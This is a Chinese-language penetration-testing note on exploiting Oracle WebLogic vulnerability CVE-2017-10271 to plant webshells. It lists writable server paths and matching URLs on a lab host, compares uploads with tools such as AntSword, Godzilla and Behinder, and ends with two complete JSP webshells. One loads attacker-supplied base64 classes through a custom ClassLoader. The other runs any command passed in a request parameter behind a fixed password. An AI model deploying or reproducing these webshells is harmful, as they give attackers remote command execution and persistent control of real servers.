以CVE-2017-10271测试,遗憾的是冰蝎jsp无法成功,冰蝎更换版本之后成功
1 上传路径
绝对路径和访问路径
方式1
-
/root/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/123.jsp
-
http://192.168.3.133:7001/console/framework/skins/wlsconsole/images/123.jsp
方式2
-
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/123/test.jsp
-
http://...:7001/uddiexplorer/shell.jsp
没有uddiexplorer,此路不通
方式3
- /root/Oracle/Middleware/user_projects/domains/application/servers/AdminServer/tmp/_WL_user/项目名/随机字符/war/shell.jsp
- http://...:7001/项目名/shell.jsp
没有application,此路不通
2 上传方式
(1)测试支持jsp
利用这里的shell上传测试
/root/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/test.jsp
<% out.print(“test”); %>
查看对应目录
ls /root/Oracle/Middleware/wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/
访问,证明支持jsp
http://192.168.3.133:7001/console/framework/skins/wlsconsole/images/test.jsp
(2)蚁剑
之前同样的方法
(3)哥斯拉
哥斯拉可以自己生成jsp马,使用之前的方法上传
默认生成的就是jsp马
(4)一句话
上传文末的jsp一句话
http://192.168.3.133:7001/console/framework/skins/wlsconsole/images/yijuhua.jsp
(5)冰蝎
3 甜点
-
不支持的情况,写了一个php马,直接回显出来
-
蚁剑jsp马,密码passwd
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
- 一句话jsp
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
- 参考链接
https://blog.csdn.net/weixin_30883311/article/details/99261700